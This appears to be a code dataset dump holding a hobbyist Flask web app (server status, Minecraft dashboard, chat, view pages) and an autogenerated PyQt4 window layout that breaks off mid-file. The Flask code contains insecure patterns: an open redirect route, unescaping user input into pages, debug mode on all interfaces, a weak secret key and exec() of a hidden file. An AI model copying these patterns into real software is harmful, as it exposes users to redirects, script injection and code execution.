content
stringlengths 0
894k
| type
stringclasses 2
values |
---|---|
import os
import json
import yaml
import time
import flask
import distro
import psutil
import random
import string
import threading
import jinja2.exceptions
from flask import request
from turbo_flask import Turbo
from datetime import datetime
try:
from mcipc.query import Client
except: # server offline
pass
from html import escape, unescape
app = flask.Flask(__name__, static_url_path='/')
app.secret_key = random.sample('ABCDEF0123456789', 6)
turbo = Turbo(app)
view_urls = {}
SERVER_NAME = 'paper'
@app.route('/x/<path:subpath>')
def show_subpath(subpath):
return f'Subpath {escape(subpath)}'
@app.route('/')
def home():
return flask.render_template('index.html')
@app.errorhandler(jinja2.exceptions.TemplateNotFound)
def template_not_found(error):
redirects = yaml.load(open('redirects.yml'), Loader=yaml.FullLoader)
path = error.name.replace('.html', '')
if path in redirects.keys():
list(flask.request.args.keys())[0] if flask.request.args.keys() else False
return flask.redirect(redirects[path])
return flask.render_template(f'error.html', title='Page not found!', description=f'Couldn\'t find this website: {error.name}')
@app.errorhandler(404)
def error_404(error):
return flask.render_template(f'error.html', title='File not found!', description=f'Couldn\'t find this file.')
@app.route('/view-create', methods=['GET', 'POST'])
def create_page():
global view_urls
if request.method == 'GET':
return flask.render_template(f'error.html', title='Unsupported request method!', description=f'This website can\'t be viewed with GET, as it\'s supposed to be POSTed.')
code = ''.join(random.sample(string.ascii_lowercase + string.ascii_uppercase + string.digits, 5))
view_urls[code] = request.get_json()
return f'https://onlix.me/view/{code}'
def fix_formatting(text: str):
return text.replace(' ', ' ').replace('\n', '\n<br>\n')
@app.route('/view/<code>')
def view_page(code):
global view_urls
if not view_urls.get(code):
return flask.render_template(f'error.html', title='View page not found!', description=f'Couldn\'t find this code: {code}')
return flask.render_template(f'view.html', title=fix_formatting(unescape(view_urls[code]['title'])), text=fix_formatting(unescape(view_urls[code]['text'])))
def readable_size(size):
return round(size/1000000000, 1)
@app.route('/status')
def status_page():
ram = psutil.virtual_memory()
disk = psutil.disk_usage('/')
return flask.render_template(f'status.html',
cpu=psutil.cpu_percent(),
cpus=psutil.cpu_count(),
threads=psutil.cpu_count(logical=False),
ram=f'{readable_size(ram[3])}/{readable_size(ram[0])} GB ({ram[2]}%)',
disk=f'{readable_size(disk[1])}/{readable_size(disk[0])} GB ({disk[3]}%)',
pids=len(psutil.pids()),
boot_days=round((time.time()-psutil.boot_time())/86400),
os=f'{distro.linux_distribution()[0]} {distro.linux_distribution()[1]}',
)
@app.route('/status/mc')
def status_mc():
ops = [x['name'] for x in json.loads(open(f'/home/minecraft/{SERVER_NAME}/ops.json').read())]
bans = [x['name'] for x in json.loads(open(f"/home/minecraft/{SERVER_NAME}/banned-players.json").read())]
ip_bans = [x['name'] for x in json.loads(open(f"/home/minecraft/{SERVER_NAME}/banned-ips.json").read())]
whitelist = [x['name'] for x in json.loads(open(f'/home/minecraft/{SERVER_NAME}/whitelist.json').read())]
last_players = [x['name'] for x in json.loads(open(f'/home/minecraft/{SERVER_NAME}/usercache.json').read())[:5]]
with Client('127.0.0.1', 25565) as client:
server_data = client.stats(full=True)
plugin_list = list(server_data.plugins.values())[0]
return flask.render_template(f'status_mc.html',
players=server_data.players,
player_count=f'{server_data.num_players}/{server_data.max_players}' if server_data else '0/0',
version=server_data.version if server_data else 'Offline',
game_type=server_data.game_type if server_data else 'Server is not avaiable',
last_player=last_players,
last_players=len(last_players),
whitelist=whitelist,
whitelisted=len(whitelist),
plugin=plugin_list,
plugins=len(plugin_list),
op=ops,
ops=len(ops),
normal_ban=bans,
ip_ban=ip_bans,
normal_bans=len(bans),
ip_bans=len(ip_bans)
)
@app.route('/red')
def red(*args, **kwargs):
try:
return flask.redirect(unescape(list(flask.request.args.keys())[0]))
except IndexError:
return flask.redirect('/')
@app.route('/mc-console-log')
def mc_console_log():
log = []
lines = open(f'/home/minecraft/{SERVER_NAME}/.console_history').read().split('\n')[:-1]
for line in lines:
line_date = line.split(':')[0]
line_command = line.split(':')[1]
for x in ['w', 'msg', 'teammsg', 'tell']:
if line_command.startswith(x):
line_command = f'{x} [CENSORED]'
if line_command.startswith('ban-ip '):
line_command = 'ban-ip [CENSORED IP]'
if line_command.startswith('pardon-ip'):
line_command = 'pardon-ip [CENSORED IP]'
line_date = datetime.fromtimestamp(int(line_date)//1000).strftime('%d.%m.%y %H:%M:%S')
log.append({'time': line_date, 'command': line_command})
log.reverse()
return flask.render_template(f'mcclog.html', log=log, server_name=SERVER_NAME)
def read_chat(channel=None):
data = yaml.load(open('chats.yml'), Loader=yaml.FullLoader)
data = data or {}
return data.get(channel) or data
def send_message(channel, user='Guest', text=''):
chat = read_chat()
if not chat.get(channel):
chat[channel] = []
chat[channel].append({'user': user, 'text': text})
yaml.dump(chat, open('chats.yml', 'w'), sort_keys=False, default_flow_style=False)
@app.route('/chat/<channel>', methods=['GET', 'POST'])
def chat_channel(channel):
if flask.request.form.to_dict().get('message'):
send_message(channel, flask.request.args.get('from') or 'Guest', flask.request.form.to_dict().get('message'))
if not read_chat(channel):
return flask.render_template(f'chat_error.html')
return flask.render_template(f'chat.html', channel=channel, messages=reversed(read_chat(channel)))
@app.before_first_request
def before_first_request():
threading.Thread(target=update_load).start()
def update_load():
with app.app_context():
while True:
time.sleep(5)
turbo.push(turbo.replace(flask.render_template('chat.html'), 'load'))
# @app.before_first_request
# def before_first_request():
# threading.Thread(target=update_load).start()
# def update_load():
# with app.app_context():
# while True:
# time.sleep(5)
# turbo.push(turbo.replace(flask.render_template('chat.html'), 'load'))
### RUN CLOSED SOURCE ###
exec(open('closed.hidden.py').read())
### ================= ###
if __name__ == '__main__':
app.run(host='0.0.0.0', port=2021, debug=True)
|
python
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'scanwindow.ui'
#
# Created: Sun Jun 5 22:23:54 2016
# by: PyQt4 UI code generator 4.10.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(727, 583)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.horizontalLayout_3 = QtGui.QHBoxLayout(self.centralwidget)
self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
self.tabWidget = QtGui.QTabWidget(self.centralwidget)
self.tabWidget.setTabPosition(QtGui.QTabWidget.South)
self.tabWidget.setObjectName(_fromUtf8("tabWidget"))
self.tab = QtGui.QWidget()
self.tab.setObjectName(_fromUtf8("tab"))
self.verticalLayout_3 = QtGui.QVBoxLayout(self.tab)
self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
self.verticalLayout_2 = QtGui.QVBoxLayout()
self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
self.txtInput = QtGui.QLineEdit(self.tab)
self.txtInput.setObjectName(_fromUtf8("txtInput"))
self.verticalLayout_2.addWidget(self.txtInput)
self.tblData = QtGui.QTableWidget(self.tab)
self.tblData.setObjectName(_fromUtf8("tblData"))
self.tblData.setColumnCount(4)
self.tblData.setRowCount(1)
item = QtGui.QTableWidgetItem()
self.tblData.setVerticalHeaderItem(0, item)
item = QtGui.QTableWidgetItem()
item.setTextAlignment(QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.tblData.setHorizontalHeaderItem(0, item)
item = QtGui.QTableWidgetItem()
self.tblData.setHorizontalHeaderItem(1, item)
item = QtGui.QTableWidgetItem()
self.tblData.setHorizontalHeaderItem(2, item)
item = QtGui.QTableWidgetItem()
self.tblData.setHorizontalHeaderItem(3, item)
item = QtGui.QTableWidgetItem()
self.tblData.setItem(0, 0, item)
item = QtGui.QTableWidgetItem()
self.tblData.setItem(0, 1, item)
item = QtGui.QTableWidgetItem()
self.tblData.setItem(0, 2, item)
item = QtGui.QTableWidgetItem()
self.tblData.setItem(0, 3, item)
self.verticalLayout_2.addWidget(self.tblData)
self.verticalLayout_3.addLayout(self.verticalLayout_2)
self.tabWidget.addTab(self.tab, _fromUtf8(""))
self.tab_2 = QtGui.QWidget()
self.tab_2.setObjectName(_fromUtf8("tab_2"))
self.tabWidget.addTab(self.tab_2, _fromUtf8(""))
self.horizontalLayout_3.addWidget(self.tabWidget)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 727, 23))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menu_File = QtGui.QMenu(self.menubar)
self.menu_File.setObjectName(_fromUtf8("menu_File"))
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.dockLivePreview = QtGui.QDockWidget(MainWindow)
self.dockLivePreview.setFeatures(QtGui.QDockWidget.DockWidgetFloatable|QtGui.QDockWidget.DockWidgetMovable)
self.dockLivePreview.setObjectName(_fromUtf8("dockLivePreview"))
self.dockWidgetContents = QtGui.QWidget()
self.dockWidgetContents.setObjectName(_fromUtf8("dockWidgetContents"))
self.verticalLayout_6 = QtGui.QVBoxLayout(self.dockWidgetContents)
self.verticalLayout_6.setObjectName(_fromUtf8("verticalLayout_6"))
self.verticalLayout = QtGui.QVBoxLayout()
self.verticalLayout.setSpacing(5)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.verticalLayout_4 = QtGui.QVBoxLayout()
self.verticalLayout_4.setSpacing(0)
self.verticalLayout_4.setContentsMargins(-1, 5, -1, -1)
self.verticalLayout_4.setObjectName(_fromUtf8("verticalLayout_4"))
self.livePreviewContainer = QtGui.QWidget(self.dockWidgetContents)
self.livePreviewContainer.setObjectName(_fromUtf8("livePreviewContainer"))
self.gridLayout = QtGui.QGridLayout(self.livePreviewContainer)
self.gridLayout.setMargin(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem, 0, 1, 1, 1)
spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridLayout.addItem(spacerItem1, 1, 0, 1, 1)
self.lblLiveView = QtGui.QLabel(self.livePreviewContainer)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lblLiveView.sizePolicy().hasHeightForWidth())
self.lblLiveView.setSizePolicy(sizePolicy)
self.lblLiveView.setMinimumSize(QtCore.QSize(100, 75))
self.lblLiveView.setMaximumSize(QtCore.QSize(1600, 1200))
self.lblLiveView.setSizeIncrement(QtCore.QSize(0, 0))
self.lblLiveView.setBaseSize(QtCore.QSize(0, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.lblLiveView.setPalette(palette)
self.lblLiveView.setAutoFillBackground(True)
self.lblLiveView.setFrameShape(QtGui.QFrame.Box)
self.lblLiveView.setText(_fromUtf8(""))
self.lblLiveView.setScaledContents(True)
self.lblLiveView.setAlignment(QtCore.Qt.AlignHCenter|QtCore.Qt.AlignTop)
self.lblLiveView.setObjectName(_fromUtf8("lblLiveView"))
self.gridLayout.addWidget(self.lblLiveView, 1, 1, 1, 1)
spacerItem2 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridLayout.addItem(spacerItem2, 1, 2, 1, 1)
spacerItem3 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem3, 2, 1, 1, 1)
self.verticalLayout_4.addWidget(self.livePreviewContainer)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.label_3 = QtGui.QLabel(self.dockWidgetContents)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.horizontalLayout.addWidget(self.label_3)
self.chkAutoSnapshot = QtGui.QCheckBox(self.dockWidgetContents)
self.chkAutoSnapshot.setObjectName(_fromUtf8("chkAutoSnapshot"))
self.horizontalLayout.addWidget(self.chkAutoSnapshot)
self.verticalLayout_4.addLayout(self.horizontalLayout)
self.horizontalLayout_2 = QtGui.QHBoxLayout()
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
self.cmbCamera = QtGui.QComboBox(self.dockWidgetContents)
self.cmbCamera.setObjectName(_fromUtf8("cmbCamera"))
self.horizontalLayout_2.addWidget(self.cmbCamera)
self.btnRefreshCameras = QtGui.QPushButton(self.dockWidgetContents)
self.btnRefreshCameras.setText(_fromUtf8(""))
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8("ui/img/reload-2x.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.btnRefreshCameras.setIcon(icon)
self.btnRefreshCameras.setObjectName(_fromUtf8("btnRefreshCameras"))
self.horizontalLayout_2.addWidget(self.btnRefreshCameras)
self.verticalLayout_4.addLayout(self.horizontalLayout_2)
self.btnTakePhoto = QtGui.QPushButton(self.dockWidgetContents)
self.btnTakePhoto.setObjectName(_fromUtf8("btnTakePhoto"))
self.verticalLayout_4.addWidget(self.btnTakePhoto)
self.verticalLayout.addLayout(self.verticalLayout_4)
self.verticalLayout_6.addLayout(self.verticalLayout)
self.dockLivePreview.setWidget(self.dockWidgetContents)
MainWindow.addDockWidget(QtCore.Qt.DockWidgetArea(2), self.dockLivePreview)
self.dockSnapshotPreview = QtGui.QDockWidget(MainWindow)
self.dockSnapshotPreview.setFeatures(QtGui.QDockWidget.DockWidgetFloatable|QtGui.QDockWidget.DockWidgetMovable)
self.dockSnapshotPreview.setObjectName(_fromUtf8("dockSnapshotPreview"))
self.dockWidgetContents_2 = QtGui.QWidget()
self.dockWidgetContents_2.setObjectName(_fromUtf8("dockWidgetContents_2"))
self.gridLayout_2 = QtGui.QGridLayout(self.dockWidgetContents_2)
self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
self.lblPreview = QtGui.QLabel(self.dockWidgetContents_2)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lblPreview.sizePolicy().hasHeightForWidth())
self.lblPreview.setSizePolicy(sizePolicy)
self.lblPreview.setMinimumSize(QtCore.QSize(100, 75))
self.lblPreview.setMaximumSize(QtCore.QSize(1600, 1200))
self.lblPreview.setBaseSize(QtCore.QSize(0, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
